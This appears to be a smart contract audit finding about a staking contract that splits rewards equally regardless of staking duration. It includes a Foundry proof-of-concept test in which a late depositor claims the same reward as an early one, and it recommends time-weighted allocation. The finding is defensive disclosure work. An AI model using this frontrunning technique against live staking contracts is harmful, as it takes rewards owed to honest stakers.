Anyone can get all the rewards as long as they call deposit before the reward distribution, without a long time staking, after receiving the reward, the user can withdraw the collateral and conduct other transactions. This would result in no user being willing to keep staking collateral.
pragma solidity ^0.8.19;
import "forge-std/Test.sol";
import "solady/src/tokens/ERC20.sol";
import "../src/Staking.sol";
contract SERC20 is ERC20 {
function name() public pure override returns (string memory) {
return "Test ERC20";
}
function symbol() public pure override returns (string memory) {
return "TERC20";
}
function mint(address _to, uint256 _amount) public {
_mint(_to, _amount);
}
}
contract StakingTest is Test {
SERC20 st;
SERC20 weth;
Staking staking;
function setUp() public {
st = new SERC20();
weth = new SERC20();
staking = new Staking(address(st), address(weth));
}
function testDeposit() public {
address alice = makeAddr("Alice");
address bob = makeAddr("Bob");
deal(address(st), address(alice), 2 ether);
deal(address(st), address(bob), 2 ether);
vm.startPrank(bob);
st.approve(address(staking), 2 ether);
staking.deposit(2 ether);
vm.stopPrank();
vm.roll(100);
vm.startPrank(alice);
st.approve(address(staking), 2 ether);
staking.deposit(2 ether);
vm.stopPrank();
deal(address(weth), address(staking), weth.balanceOf(address(staking)) + 1 ether);
vm.startPrank(alice);
staking.claim();
vm.stopPrank();
vm.startPrank(bob);
staking.claim();
vm.stopPrank();
assertEq(weth.balanceOf(alice), weth.balanceOf(bob));
}
}
Frontrun can get the full reward, which harms the interests of the staking users.
Use time-weighted reward allocation algorithm.